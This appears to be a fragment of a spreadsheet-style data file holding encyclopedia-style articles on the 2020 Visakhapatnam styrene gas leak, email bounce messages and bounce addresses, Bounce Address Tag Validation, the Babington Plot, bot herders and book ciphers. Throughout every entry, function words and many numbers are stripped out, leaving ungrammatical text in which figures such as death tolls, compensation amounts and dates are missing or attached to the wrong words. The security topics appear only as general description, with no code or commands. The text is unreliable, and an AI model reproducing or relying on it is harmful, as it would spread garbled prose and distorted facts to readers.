never asked federal clearance 2017, minutes meeting company andhra pradesh pollution control board, latter denied former's request producing engineering plastics plant. however, member state pollution board said information regarding order state government stop plant's operation. 2018, company applied environmental clearance first time, expand manufacturing capacity polystyrene, plastic used make bottles lids. environment ministry sent application review citing company clearance chemicals already manufacturing. company withdrew application applying retroactive clearance ministry offered companies 2018 one-time amnesty, remained pending fatal leak occurred.according officials legal experts like mahesh chandra mehta, environment lawyer, indicated plant seemed operating legal grey area, environmental clearance required central regulations state executives look enforcement. however, date indication lack environment clearance played role disaster. experts also skeptical, plant operated years without clearance. mehta also pointed many industries operating without clearance, shows weak environmental laws india credit several world's polluted cities. mehta also said time company renewed permit, state pollution board, power enforce federal environmental law, would able fine company deny permit received federal clearance, never did. sengupta, environmental scientist former head central pollution control board (cpcb), said state permits consider pollution consider site safety. contrast, federal clearance assesses risks concerning handling storage hazardous materials, prevention potential disasters, mitigation cases disaster. leakage effects facilities leakage plant re-opened 2020 following nationwide lockdown implemented response covid-19 pandemic. plant stored 2,000 metric tons (1,968 long tons; 2,205 short tons) styrene tanks, left unattended. styrene monomer must stored 20–22 (68–72 higher temperatures result rapid vaporization. believed computer glitch factory's cooling system allowed temperatures storage tanks exceed safe levels, causing styrene vaporize. between 2:30 a.m. 3:00 a.m., maintenance activity progress, leaked plant spread nearby villages. acute effects fumes spread radius (1.86 mi). five villages venkatapuram, padmapuram, colony, gopalapatnam, kamparapalem) affected areas. hundreds people rushed hospitals following widespread breathing difficulties sensations burning eyes. many found lying ground, unconscious result exposure. initial estimate noted least deaths 20–25 people critical condition. next day, death toll risen thirteen. more 1,000 people reportedly exposed gas.late night may, police ordered evacuation people (1.2 radius leak. however, police subsequently stated evacuation precautionary second leak. probable leakage removal chemicals experts central government inspected plant said would faced catastrophe violation safety norms storage facilities plant gone unnoticed days. they said facilities vulnerable leak vapour larger scale stored high-risk condition. expert said polymerization noticed another storage.according deccan chronicle, experts national disaster management authority (ndma), anjan ray, director indian institute petroleum, shantanu geete, industry expert, inspected storage facilities plant, well vizag port. ray, expert styrene, recommended government immediately remove materials facility. 2020, andhra pradesh government directed company remove 13,000 metric tonnes (mt) material country. with ministry shipping's help, state government arranged vessels carry load, split portions 8,000 5,000 company's headquarter seoul.mekapati goutham reddy, minister industries andhra pradesh, said preliminary conclusion experts' inspections storage facilities designed keep material long duration. however, plant personnel claimed material emptied every days never stored assigned period. relief rescue nearly 200-250 families evacuated villages five-kilometre (3.1 radius around plant. about people hospitalized, according media report. chief minister andhra pradesh, jaganmohan reddy, announced gratia crore (us$130,000) family killed result accident. also announced ₹25,000 (us$310) received primary treatment, lakh (us$1,300) received longer treatment, million (us$13,000) ventilator support.to prevent dangerous polymerization self-heating styrene, kilograms (1,100 polymerization inhibitor 4-tert-butylcatechol (ptbc) airlifted government andhra pradesh sent crippled factory. additionally, central government flew national disaster response force (ndrf) specialized cbrn (chemical, biological, radiological, nuclear) team pune site. remedial measures chemicals started support measures eliminate risk factors plant. effort, brought actify 2680, green retarder, actify 2673, polymerisation inhibitor, dorf ketal chemicals, mumbai-based chemical company. ensure site's safety, said retarder inhibitor would added tanks styrene stored polymers prevent polymerization future vapor leaks. actify series retarder green polymer retardant displays thermal stability protection unscheduled shutdowns.on 2020, chemicals informed media eight-member technical team, comprising experts seoul headquarters' departments production, environment, safety sent investigate incident rehabilitate victims. polymers india said team would take prompt rehabilitation real-time remedial measures. they would meet victims affected families explain support measures detail hold meetings local state government officials. investigation according preliminary investigation, valve malfunction believed caused leak. leak chemical tanks left unattended since march 2020 covid-19 lockdown. malfunctioning tank's refrigerating unit increase temperature, causing liquid chemical, suspected styrene, evaporate. however, experts claimed chemicals also leaked, styrene unlikely spread kilometres (2+1⁄2 chemical properties. legal actions part police investigation following leak, first information report (fir) filed polymers local police. report allowed possible charges sections (making atmosphere noxious health), (negligent conduct respect poisonous substance), (negligent conduct respect fire combustible matter), (causing hurt endangering life personal safety others), (causing grievous hurt endangering life), (causing death rash negligent amounting culpable homicide) indian penal code (ipc). national green tribunal petition filed national green tribunal (ngt), india's environmental court, demanding investigation incident high-level committee. bench headed chair, justice adarsh kumar goel, formed, case scheduled heard 2020.on may, bench ordered polymers india deposit amount crore (us$6.3 million) initial amount district magistrate vishakapatnam mitigate damages caused incident. issued notices andhra pradesh pollution control board (appcb), central pollution control board (cpcb) union ministry environment, forest climate change (moefcc), sought responses individual boards ministry. also constituted five-member fact-finding committee probe incident deliver report bench. committee would supervised former andhra pradesh high court judge, seshasayana reddy.the report high-level committee headed chair issued 2020, accessed reviewed associated press, found storage tanks outdated lacked temperature sensors, allowing styrene vaporization undetected. with factory workers overall company inexperienced storing tanks dangerous chemicals, report blamed incident "gross human failure" lack basic safety norms. human rights commission incident, national human rights commission india (nhrc) gave notice andhra pradesh government central government considered incident gross violation india's constitutional right life. notice, nhrc seeking detailed report andhra pradesh government rescue operations, medical treatment, rehabilitation. also asked union ministry corporate affairs investigate possible breaches workplace health safety law. both reports expected delivered within four weeks. also 2020 assam leak 2022 surat leak bhopal disaster system accident references bibliography vizag leak recent human disasters potential change lives forever business insider</t>
  </si>
  <si>
    <t>Bounce message</t>
  </si>
  <si>
    <t>bounce message "bounce" automated message email system, informing sender previous message message delivered delivery problem occurred). original message said "bounced". this feedback immediate (some causes described here) sending system retry, arrive days later retries end. more formal terms bounce message include "non-delivery report" "non-delivery receipt" (ndr), [failed] "delivery status notification" (dsn) message, "non-delivery notification" (ndn). bounces classification although smtp mature technology, counting thirty years, architecture increasingly strained normal unsolicited load. email systems enhanced reputation systems tied actual sender email, idea recipient's email servers rejecting email forged sender used protocol. therefore, types email bounces created: hard bounces soft bounces. both affect reputation sender email service providers (esps) consider total bounce rate decision factor directing email user's inbox. briefly, total bounce rate calculated hard bounce rate soft bounce rate. hard bounces hard bounces permanent score higher terms sender's damage. hard bounces occur sender's mail server determines high likelihood recipient unavailable likely remain occasions hard bounces occur recipient email finds following situations: incorrect identifier/incorrect domain (such typo email address domain) server accept emails anymore. case, removal email addresses bounce back mandatory. soft bounces soft bounces temporary. bounced message experiences soft bounce tried redelivered another time. soft bounces happen recipient email either full inbox therefore space store another email, limit size emails allowed receive. additional situations soft bounce appears block recipient's email mark certain sender 'spam' sender, blacklist certain sender. moreover, temporary suspension recipient's email temporary error server also causes soft bounce. delivery errors errors occur multiple places mail delivery. sender sometimes receive bounce message mail server, reporting unable send message, alternatively recipient's mail server reporting although accepted message, unable deliver specified user. when server accepts message delivery, also accepting responsibility deliver bounce message event delivery fails. bounce lack disk space when e-mail arrives destination server address (such mymail.example, sending alice@mymail.example), mail daemon unable deposit message specified user's mailbox underlying hard drive server insufficient space. bounce unreachable destination when sending e-mail, service e-mail sent unable reach destination address. case, sender would receive bounce message mail server. common causes mail servers unable reach destination: unable resolve destination address. example, domain name exist. unable establish connection destination address. example, address assigned server, server offline. bounce forged message users receive erroneous bounce messages messages never actually sent. this happen particular context email spam email viruses, spammer (sender) forge message another user (intended recipient spam), forges message appear another user third party). message cannot delivered intended recipient, bounce message would "returned" third party instead spammer. this called backscatter. other causes library.example mail server known message would undeliverable (for instance, jill user account there) would accepted message first place, therefore would sent bounce. instead, would rejected message smtp error code. this would leave jack's mail server store.example) obligation create deliver bounce. terminology bounces special form autoresponder. autoresponses (automatic replies) mails sent program—as opposed human user—in reply received mail sent bounce address. examples auto replies vacation mails, challenges challenge-response spam filtering, replies list servers, feedback reports. these auto replies discussed 3834: auto replies sent return-path stated received mail triggered auto reply, response typically sent empty return-path; otherwise auto responders could trapped sending auto replies back forth.the return-path visible delivered mail header field return-path inserted smtp mail delivery agent (mda) (which usually combined mail transfer agent, mta). simply copies reverse path smtp mail from command return-path. also removes bogus return-path header fields inserted mtas; header field generally guaranteed reflect last reverse path seen mail from command. today paths normally reduced ordinary email addresses, smtp 'source routing' deprecated 1989; historical background info sender rewriting scheme. special form path still exists: empty path mail from:&lt;&gt;, used many auto replies especially bounces. strict sense, bounces sent non-empty return-path incorrect. 3834 offers heuristics identify incorrect bounces based local part (left hand side "@") address non-empty return-path, even defines mail header field, auto-submitted, identify auto replies. mail header part mail data (smtp command data), mtas typically look mail. they deal envelope, includes mail from address (a.k.a. return-path, envelope-from, "reverse path") not, e.g., 2822-from mail header field from. these details important schemes like batv. remaining bounces empty return-path non-delivery reports (ndrs) delivery status notifications (dsns). dsns explicitly solicited smtp service extension, however widely used. explicit requests delivery failure details much commonly implemented variable envelope return path (verp), explicit requests rarely implemented.ndrs basic smtp function. soon accepted mail forwarding delivery cannot silently delete ("drop") create send bounce message originator forwarding delivery failed. bouncing rejecting excluding mdas, mtas forward mails another mta. this next free reject mail smtp error message like "user unknown", "over quota", etc. point sending bounce message, i.e. inform originator. bounce arise also without rejecting mta, 5321 puts smtp server accepted task relaying mail later finds destination incorrect mail cannot delivered reason, must construct "undeliverable mail" notification message send originator undeliverable mail indicated reverse-path)." this rule essential smtp: name says, 'simple' protocol, cannot reliably work mail silently vanishes black holes, bounces required spot problems. silently dropping messages today, however, common receive mostly spam emails, usually uses forged return-paths. often impossible inform originator, sending bounce forged return-path would innocent third party. addition, specific reasons preferable silently drop message rather reject (let alone bounce it): heuristically filtered spam. spam filters perfect. rejecting spam based content filtering implies giving spammers test environment several alternatives find content passes filter. viruses worms. most times sent automatically infected machine. since bounce contain copy worm itself, contribute diffusion.quoting 5321, section 6.2: discussed section section below, dropping mail without notification sender permitted practice. however, extremely dangerous violates long tradition community expectations mail either delivered returned. silent message-dropping misused, could easily undermine confidence reliability internet's mail systems. silent dropping messages considered cases high confidence messages seriously fraudulent otherwise inappropriate." validating sender inherent flaw today's smtp, without deprecated source routes mentioned earlier. this addressed various proposals, directly batv spf. causes bounce message there many reasons email bounce. reason recipient address misspelled, simply exist receiving system. this user unknown condition. other reasons include resource exhaustion full disk rejection message spam filters. addition, muas allow users "bounce" message demand. these user-initiated bounces bogus bounces; definition, real bounce automated, emitted mda. bounce messages smtp sent envelope sender address known null sender address. they frequently sent from: header address mailer-daemon recipient site. typically, bounce message contain several pieces information help original sender understanding reason message delivered: date time message bounced, identity mail server bounced reason bounced (e.g. user unknown mailbox full), headers bounced message, some content bounced message.rfc 3463 describes codes used indicate bounce reason. common codes 5.1.1 (unknown user), 5.2.2 (mailbox full) 5.7.1 (rejected security policy/mail filter). format format reporting administrative messages defined 6522. mime multipart/report message composed three parts: human readable explanation; machine parsable message/delivery-status, list "name: type; value" lines state several possible fields; original message, portion thereof, entity type message/rfc822.the second part also quite readable. essential understand played role. reporting-mta responsible composing sending dsn. when remote-mta rejects message smtp transaction, field diagnostic-code type smtp used report value. note beside numerical 3-digit value, smtp response contains human readable part. information sometimes reported e.g.,while talking smtp.store.example [192.0.2.3] rcpt to:&lt;nonexistinguser@store.example&gt; user security implications 10/04/2021 australian security researcher (sebastian salla) demonstrated email bounce messages could abused reduce operational effectiveness email spam malware filters. default behaviour many email gateways include untampered copy inbound message headers within bounce messages. through analysis message headers, threat actor able positively identify whether email would targets mailbox. this attack scaled encompass dozens vulnerable targets improves efficiency phishing campaigns. also backscatter (backscatter email spam) bounce address validation (batv) email tracking sender policy framework (spf) domainkeys identified mail (dkim) sender rewriting scheme (srs) simple mail transfer protocol (smtp) variable envelope return path (verp) related rfcs 5321 simple mail transfer protocol 3461 simple mail transfer protocol (smtp) service extension delivery status notifications (dsns) 6522 multipart/report media type reporting mail system administrative messages 3463 enhanced status codes smtp 3464 extensible message format delivery status notifications 3834 recommendations automatic responses electronic mail 5337 internationalized delivery status disposition notifications references external links mail ddos attacks delivery messages microsoft dsns ndrs exchange server understanding bounce email</t>
  </si>
  <si>
    <t>Bounce address</t>
  </si>
  <si>
    <t>bounce address email address bounce messages delivered. there many variants name, none used universally, including return path, reverse path, envelope from, envelope sender, mail from, 5321-from, return address, from_, errors-to, etc. uncommon single document several names. names refer email address provided mail from command smtp session. background information ordinarily, bounce address seen email users and, without standardization name, cause confusion. email message thought resembling traditional paper letter envelope, "header fields", to:, from:, subject:, along body message analogous letterhead body letter normally presented visible user. however, envelope analogy contents mail from rcpt fields smtp session neither normally visible user. while common from: information letter "envelope" values, always case. example, electronic mailing lists, information seen "from:" header come person sent email list, bounce address mailing list software, problems delivering mailing list messages handled correctly. only envelope information looked resolve email body email examined. mail transfer agents (mta) using smtp protocol rcpt command determine email mail from command indicate came from. usage while original usage provide information return bounce messages, since late 1990s, uses come about. these typically take advantage properties bounce address, given early smtp session, message rejected without receiving body. typically seen users altered include additional information without confusing them. required part mail transfer agent software, easy programs use. contrast, "from" address body mail several different headers (e.g. from:, sender:, resent-from:, etc.) missing entirely.extended uses include mailing list handling variable envelope return path (verp), email authentication spf, spam filtering, backscatter reduction bounce address validation. terminology various terms different origins sometimes different meanings, although differences often become moot modern internet. bounce address when email delivered, create bounce message send address given mail from command. used 4406. return path when email recipient's email box, mail header created name "return-path:" containing address mail from command. earlier forms email (such uucp) would require information "hop" along path email traveled reach destination, hence "path" part name. used 2821, 3834, 4409. reverse path argument smtp mail from command, whose content supposed consist envelope sender address. used 5321, 3464, 3834, internet mail architecture. envelope information smtp protocol uses analogous envelope letter. used 5230, 5233. envelope sender address mailbox address non-empty reverse path excluding (deprecated) reverse routing info. used 2821, 3461, 3464, 3798, 5228. envelope return address similar envelope sender address, used 3461, 3464, 3834, 4952. mail from this variation comes directly smtp mail from command name. used 5321, 3464, 3834, 4408, 4409, 4952. 2821-from until october, 2008, smtp defined 2821, body email defined 2822. term "2821-from" makes clear address referred mail from information, "2822-from:" refers address "from:" header seen users. used 5598. 5321-from evolution 2821-from october, 2008, smtp defined 5321. return address another term comes letter analogy email. used 5321, 3834. from_ when email gets delivered user's email box, file format used mbox format. format, email address mail from command placed line beginning "from" followed single space, "from_" term uses underscore represent space distinguish "from:" mail header. mailbox format, lines actual email begin "from escaped changed lines begin "&gt;from also bounce message email forwarding variable envelope return path sender rewriting scheme</t>
  </si>
  <si>
    <t>Bounce Address Tag Validation</t>
  </si>
  <si>
    <t>computing, bounce address validation (batv) method, defined internet draft, determining whether bounce address specified e-mail message valid. designed reject backscatter, bounce messages forged return addresses. overview basic idea send e-mail return address includes timestamp cryptographic token cannot forged. e-mail returned bounce without valid signature rejected. e-mail bounced back empty (null) return address bounces never created bounce therefore preventing messages bouncing back forth forever. batv replaces envelope sender like mailbox@example.com prvs=tag-value=mailbox@example.com, prvs, called "simple private signature", possible tagging schemes; actually, fully specified draft. batv draft gives framework possible techniques into. other types implementations, using public signatures verified third parties, mentioned left undefined. overall framework vague/flexible enough similar systems sender rewriting scheme framework. history sami farin proposed anti-bogus bounce system 2003 news.admin.net-abuse.email, used basic idea putting hard forge hash message's bounce address. late 2004, goodman proposed much complex "signed envelope sender" included hash message body intended address wide variety forgery threats, including bounces forged mail. several months later, levine crocker proposed batv current name close current form. problems draft anticipates problems running batv. some mailing lists managers (e.g. ezmlm) still bounce address, recognize batv mangling. greylisting requires batv implementations keep across retransmissions reasonable time. this also cause e-mail delayed unless greylisting system ignores tag, whitelists sending hosts successfully retry. challenge-response spam filtering systems sort mail based bounce address (e.g. removing duplicates) work less smoothly batv-tagged addresses.there also problems prevent batv systems eliminating backscatter. some legitimate e-mail gets sent empty return address bounce therefore special tokens. example, delivery status notification extension defined 3461 requires null return path sending email "notify=never" option non-conforming server. some e-mail bounces (incorrectly) sent return address, e-mail address from: header. some mail systems implement callback verification "postmaster" instead null return address. also sender policy framework (spf) sender rewriting scheme (srs) simple mail transfer protocol (smtp) variable envelope return path (verp) references external links batv draft batv page greylisting batv archived 2010-03-23 wayback machine implementation batv (with batv tester) qmail netqmail</t>
  </si>
  <si>
    <t>Babington Plot</t>
  </si>
  <si>
    <t>babington plot plan 1586 assassinate queen elizabeth protestant, mary, queen scots, roman catholic cousin, english throne. mary's execution, result letter sent mary (who imprisoned years since 1568 england behest elizabeth) consented assassination elizabeth.the long-term goal plot invasion england spanish forces king philip catholic league france, leading restoration religion. plot discovered elizabeth's spymaster francis walsingham used entrap mary purpose removing claimant english throne. chief conspirators anthony babington john ballard. babington, young recusant, recruited ballard, jesuit priest hoped rescue scottish queen. working walsingham double agents robert poley gilbert gifford, well thomas phelippes, agent cryptanalyst, puritan maliverey catilyn. turbulent catholic deacon gifford walsingham's service since 1585 beginning 1586. gifford obtained letter introduction queen mary confidant her, thomas morgan. walsingham placed double agent gifford decipherer phelippes inside chartley castle, queen mary imprisoned. gifford organised walsingham plan place babington's queen mary's encrypted communications beer barrel cork intercepted phelippes, decoded sent walsingham.on july 1586, babington letter sent mary decoded phelippes. mary responded code july 1586 ordering would-be rescuers assassinate queen elizabeth. response letter also included deciphered phrases indicating desire rescued: "the affairs thus prepared" suddenly transported place". fotheringay trial october 1586, elizabeth's lord high treasurer lord burghley walsingham used letter mary refused admit guilty. betrayed secretaries curle confessed pressure letter mainly truthful. mary's imprisonment mary, queen scots, roman catholic, regarded roman catholics legitimate heir throne england. 1568 escaped imprisonment scottish rebels sought first cousin removed, queen elizabeth year forced abdication throne scotland. issuance papal bull regnans excelsis pope pius february 1570, granted english catholics authority overthrow english queen. queen mary became focal point numerous plots intrigues restore england former religion, catholicism, depose elizabeth even take life. rather expected aid, elizabeth imprisoned mary nineteen years charge succession jailers, principally earl shrewsbury. 1584 elizabeth's privy council signed "bond association" designed cecil walsingham stated anyone within line succession throne whose behalf anyone plotted queen, would excluded line executed. this agreed upon hundreds englishmen, likewise signed bond. mary also agreed sign bond. following year, parliament passed association, provided execution anyone would benefit death queen plot discovered. because bond, mary could executed plot initiated others could lead accession england's throne. queen elizabeth ordered queen mary transferred back ruined tutbury castle wintry weather christmas 1569. mary became conditions captivity, imprisoned damp cold room closed windows access sun. 1585, elizabeth ordered mary transferred coach heavy guard placed strictest confinement chartley hall staffordshire, control amias paulet. prohibited correspondence outside world. puritan paulet chosen queen elizabeth part abhorred queen mary's catholic faith. reacting growing threat posed catholics, urged pope catholic monarchs europe, francis walsingham, queen elizabeth's secretary state spymaster, together william cecil, elizabeth's chief advisor, realised mary could implicated plot assassinate elizabeth, could executed papist threat diminished. wrote earl leicester: long devilish woman lives, neither majesty must make account continue quiet possession crown, faithful servants assure safety lives." walsingham used babington ensnare queen mary sending double agent, gilbert gifford paris obtain confidence morgan, locked bastille. morgan previously worked george talbot, earl shrewsbury, earlier jailor queen mary. through shrewsbury, queen mary became acquainted morgan. queen mary sent morgan paris deliver letters french court. while paris, morgan became involved previous plot designed william parry, resulted morgan's incarceration bastille. 1585 gifford arrested returning england coming sussex letters introduction morgan queen mary. walsingham released gifford work double agent, babington plot. gifford used alias "no. used aliases colerdin, pietro cornelys. walsingham gifford function courier entrapment plot queen mary. plot babington plot related several separate plans: solicitation spanish invasion england purpose deposing protestant queen elizabeth replacing catholic queen mary; plot assassinate queen elizabeth.at behest mary's french supporters, john ballard, jesuit priest agent roman church, went england various occasions 1585 secure promises northern catholic gentry behalf mary. march 1586, john savage, ex-soldier involved separate plot elizabeth sworn oath assassinate queen. resolved plot consulting three friends: william gifford, christopher hodgson gilbert gifford. gilbert gifford arrested walsingham agreed double agent. gifford already walsingham's employ time savage going ahead plot, according conyers read. later year, gifford reported charles paget bernardino mendoza, told english catholics prepared mount insurrection elizabeth, provided would assured foreign support. while uncertain whether ballard's report extent catholic opposition accurate, certain able secure assurances support would forthcoming. returned england, persuaded member catholic gentry, anthony babington, lead organise english catholics elizabeth. ballard informed babington plans proposed. babington's later confession made clear ballard sure support catholic league: told retorned fraunce uppon occasion. being mendoza paris, informed regarde iniuries state unto greatest christian princes, nourishinge sedition divisions provinces, withholding violently lawful possessions some, invasion indies piracy, robbing treasure wealthe others, sondry intolerable wronges great mighty princes indure, resolved catholique league seeke redresse satisfaction, vowed performe sommer without farther delay, havinge readiness suche forces warlike preparations like never scene partes christendome pope chief disposer, christian king king catholic princes league concurred instruments righting wronges, reformation religion. conductors enterprise french nation, guise, brother main; italian hispanishe forces, parma; whole number 60,000. despite assurance foreign support, babington hesitant, thought foreign invasion would succeed long elizabeth remained, ballard answered plans john savage would take care that. after lengthy discussion friends soon-to-be fellow conspirators, babington consented join lead conspiracy.unfortunately conspirators, walsingham certainly aware aspects plot, based reports spies, notably gilbert gifford, kept tabs major participants. while could shut part plot arrested involved within reach, still lacked piece evidence would prove queen mary's active participation plot feared commit mistake might cost elizabeth life. infiltration after throckmorton plot, queen elizabeth issued decree july 1584, prevented communication mary. however, walsingham cecil realised decree also impaired ability entrap mary. they needed evidence could executed based bond association tenets. thus walsingham established line communication, could carefully control without incurring suspicion mary. gifford approached french ambassador england, guillaume l'aubespine, baron châteauneuf-sur-cher, described correspondence arrangement designed walsingham. gifford jailer paulet arranged local brewer facilitate movement messages queen mary supporters placing watertight casing inside stopper beer barrel. thomas phelippes, cipher language expert walsingham's employ, quartered chartley hall receive messages, decode send walsingham. gifford submitted code table (supplied walsingham) chateauneuf requested first message sent mary. subsequent messages mary would sent diplomatic packets chateauneuf, passed gifford. gifford would pass walsingham, would confide phelippes. cipher used nomenclator cipher. phelippes would decode make copy letter. letter resealed given back gifford, would pass brewer. brewer would smuggle letter mary. mary sent letter supporters, would reverse process. short order, every message coming chartley hall intercepted read walsingham. correspondence myself gentlemen hundred followers undertake delivery royal person hands enemies. dispatch usurper, obedience excommunication made free, noble gentlemen, private friends, zeal bear catholic cause majesty's service undertake tragical execution. this letter received mary july 1586, dark mood knowing betrayed favour elizabeth, three days later replied babington long letter outlined components successful rescue need assassinate elizabeth. also stressed necessity foreign rescue attempt succeed: long shown unto foreign catholic princes, done king spain, time catholics remaining, exposed persecutions cruelty, daily diminish number, forces, means power. remedy thereunto speedily provided, fear little shall become altogether unable ever rise receive all, whensoever offered. then mine part, pray assure principal friends that, albeit cause particular interest case... shall always ready willing employ therein life have, ever look for, world." mary, response letter, advised would-be rescuers confront puritans link case queen england heir. these precepts serve found establish among associations, considerations general, done preservation defence, well religions lands, lives goods, oppressions contempts said puritans, without directly writing, giving anything queen, rather showing willing maintain her, lawful heirs her, unnaming mary clear support murder elizabeth would liberty catholic domination england. addition, queen mary supported letter, another ambassador mendoza, spanish invasion england. letter intercepted deciphered phelippes. time, phelippes, direction walsingham, kept original made copy, adding request names conspirators: would glad know names quelityes sixe gentlemen accomplish dessignement, shall able uppon knowledge parties give advise necessarye followed therein; even wish made acquainted names principal persons [&amp;c.] also time time particularlye proceede purpose alredye farr every privye hereunto. then, letter sent would destroy mary's life. great plot commence.signedmary arrests, trials executions john ballard arrested august 1586, torture confessed implicated babington. although babington able receive letter postscript, able reply names conspirators, arrested. others taken prisoner august 1586. mary's secretaries, claude boisselière gilbert curle, likewise taken custody interrogated. conspirators sentenced death treason conspiracy crown, hanged, drawn, quartered. this first group included babington, ballard, chidiock tichborne, thomas salisbury, henry donn, robert barnewell john savage. group seven including edward habington, charles tilney, edward jones, john charnock, john travers, jerome bellamy, robert gage, tried convicted shortly afterward. ballard babington executed september 1586 along tried them. such public outcry horror execution elizabeth changed order second group allowed hang "quite dead" disembowelling quartering. october 1586 mary sent tried fotheringhay castle northamptonshire english lords, bishops earls. permitted legal counsel, permitted review evidence her, call witnesses. portions phellipes' letter translations read trial. mary convicted treason england. english lord voted guilty. elizabeth signed cousin-once-removed's death warrant, february 1587, front witnesses, mary, queen scots, executed beheading. literature mary stuart (german: maria stuart), dramatised version last days mary, queen scots, including babington plot, written friedrich schiller performed weimar, germany, 1800. this turn formed basis maria stuarda, opera donizetti, 1835. although babington plot occurs events opera, referenced twice opera, second occasion mary admitting part private confessor role taken lord talbot opera, although real life). story babington plot dramatised novel conies jane lane (isbn 0-7551-0835-3), features prominently anthony burgess's dead deptford. fictional account given story book series, queen's spies (retitled kill queen 2008) told diary format fictional elizabethan girl, kitty. babington plot forms historical background provides much intrigue holy spy, historical detective series rory clements, featuring john shakespeare, intelligencer walsingham elder brother famous will. simplified version babington plot also subject children's young adult novel, traveller time (1939), alison uttley, grew near babington family home derbyshire. young modern girl finds slips back time shortly plot implemented. this later made mini-series 1978, small changes original novel. babington plot also dramatized 2017 follett novel column fire, jacopo della quercia's 2015 novel license quill, parris’s 2020 novel execution, latest novels featuring giordano bruno protagonist. plot figures prominently first chapter code book, survey history cryptography written simon singh published 1999. dramatic adaptations episode four television series elizabeth (titled "horrible conspiracies") devoted babington plot, movie elizabeth: golden deals well. 45-minute drama entitled babington plot, written michael butt directed sasha yevtushenko, broadcast radio december 2008 part afternoon drama. this drama took form documentary first anniversary executions, story told perspectives thomas salisbury, robert poley, gilbert gifford others who, conspirators, connected events, interviewed presenter (played stephen greif). cast also included samuel barnett thomas salisbury, burn gorman robert poley, jonathan taffler thomas phelippes inam mirza gilbert gifford. episode 2017 miniseries elizabeth secret agents (broadcast u.s. 2018 queen elizabeth's secret agents) deals part babington plot. also rising north ridolfi plot throckmorton plot history cryptography notes references further reading gordon-smith, alan. babington plot. london: macmillan (1936) guy, john queen scots: true life mary stuart (2005) lewis, jayne elizabeth. trial mary queen scots: brief history documents (1999) pollen, john hungerford. "mary queen scots babington plot," month, volume online (april 1907) 356–65 read, conyers. secretary walsingham policy queen elizabeth vols. (1925) shepherd, j.e.c. babington plot: jesuit intrigue elizabethan england. toronto, ont.: wittenburg publications, 1987. without isbn williams, penry. "babington, anthony (1561–1586)", oxford dictionary national biography (2004) accessed sept 2011 military heritage august 2005, volume 20–23, issn 1524-8666. briscoe, alexsandra, "elizabeth's network", history online february 2011) primary sources pollen, john hungerford, "mary queen scots babington plot," scottish historical society ser., (1922), reprints major documents. external links camden's account babington plot portraits babington plotters execution ballad describing ordeal babington plot national archives</t>
  </si>
  <si>
    <t>Bot herder</t>
  </si>
  <si>
    <t>herders hackers automated techniques scan specific network ranges find vulnerable systems, machines without current security patches, install program. infected machine become many zombies botnet responds commands given herder, usually internet relay chat channel. herders includes controller conficker. herder usually uses pseudonym keep anonymous, proxy servers, shell accounts bouncers conceal address thus maintaining anonymity. also internet botnet references</t>
  </si>
  <si>
    <t>Book cipher</t>
  </si>
  <si>
    <t>book cipher, ottendorf cipher, cipher aspect book piece text. books, common widely available modern times, convenient objects made specifically cryptographic purposes. typically essential correspondents book, edition.traditionally, book ciphers work replacing words plaintext message location words book used. mode, book ciphers properly called codes. this problems; word appears plaintext book, cannot encoded. alternative approach gets around problem replace individual letters rather words. method, used second beale cipher, replaces first letter word book word's position. case, book cipher properly cipher specifically, homophonic substitution cipher. however, used often, technique side effect creating larger ciphertext (typically digits required encipher letter syllable) increases time effort required decode message. choosing main strength book cipher key. sender receiver encoded messages agree book publication available cipher. someone intercepting message attempting decode unless skilled cryptographer (see security below), must somehow identify huge number possibilities available. context espionage, book cipher considerable advantage enemy territory. conventional codebook, discovered local authorities, instantly incriminates holder gives authorities chance deciphering code sending false messages impersonating agent. hand, book, chosen carefully spy's cover story, would seem entirely innocuous. drawback book cipher parties possess identical copy key. book must sort would look place possession using must type likely contain words required. thus, example, wishing send information troop movements numbers armaments would unlikely find cookbook romance novel useful keys. using widely available publications dictionary another approach dictionary codebook. this guarantees nearly words found, also makes much easier find word encoding. this approach used george scovell duke wellington's army campaigns peninsular war. scovell's method, codeword would consist number (indicating page dictionary), letter (indicating column page), finally number indicating entry column meant. however, approach also disadvantage: entries arranged alphabetical order, code numbers. this give strong hints cryptanalyst unless message superenciphered. wide distribution availability dictionaries also present problem; likely anyone trying break code also possession dictionary used read message. bible cipher bible widely available book almost always printed chapter verse markings making easy find specific string text within making particularly useful purpose; widespread availability concordances ease encoding process well. security essentially, code version "book cipher" like code, trouble preparing distributing codebook eliminated using existing text. however means, well attacked usual means employed codes ciphers, partial solutions help cryptanalyst guess codewords, even break code completely identifying text. this however, book cipher broken. still susceptible methods cryptanalysis, quite easily broken, even without sophisticated means, without cryptanalyst idea book cipher keyed to.if used carefully, cipher version probably much stronger, acts homophonic cipher extremely large number equivalents. however, cost large ciphertext expansion. examples famous book cipher beale ciphers, document uses variant printing united states declaration independence text. american revolution, benedict arnold used book cipher, sometimes known arnold cipher, used william blackstone's commentaries laws england text. book ciphers consistently used throughout cicada 3301 mystery. fiction colony, television series, resistance movement uses book cipher communicate members cells. novel monsieur lecoq, published 1868, monsieur lecoq finds prisoner communicating confederate using double book cipher. since prisoner book, songs béranger, solution easily discovered. valley fear, sherlock holmes decrypts message enciphered book cipher deducing book used text. name follett's world thriller rebecca refers german cairo using daphne maurier's novel rebecca basis code. presumption death, lord peter wimsey, assignment british intelligence world nazi-occupied europe, uses code based works john donne. germans break code, coming near catching wimsey bunter. wimsey improvises code, based unpublished text known wife. graham greene's protagonists often book codes. human factor, several books used, edition charles lamb's tales shakespeare used havana. book cipher plays important role version sharpe's sword. text voltaire's candide. 2004 film national treasure, "ottendorf cipher" discovered back u.s. declaration independence, using "silence dogood" letters text. protagonists matthew reilly novel sacred stones used book cipher send confidential messages other. text harry potter books, messages sent lord rings forum make text harder identify. lost: mystery island, series four jigsaw puzzles released 2007, ottendorf cipher used puzzle's hide spoilers reveal information show fans. "the fisher king", two-part episode criminal minds, features ottendorf cipher brought behavioral analysis unit unsub agent hotchner's wife. cypher part larger puzzle find girl missing years. text collector john fowles. burn notice (episodes "where there's smoke" "center storm", 2010): michael westen steals bible safe deposit code book simon. this becomes part season plot track organization starting wars profit michael tries arrange interview simon. episode "the blind banker" series sherlock, sherlock holmes searches book cipher used chinese tong smugglers communicate agents graffiti messages. eventually finds london a-z. film unknown (2011), prof. bressler's passwords obscured ottendorf cipher. unit episode "paradise lost", jonas blane (aka snake doctor) uses book code poem paradise lost communicate wife, molly, arrived safely panama. "the good soldier švejk" jaroslav hašek, officers švejk's battalion attempt book cipher. their attempts undone, however, revealed novel question composed volumes, švejk delivered first volume officers, thinking intended read novel, rather second, used cipher. furthermore, cipher identical example given published military textbook. instance fingerpost, 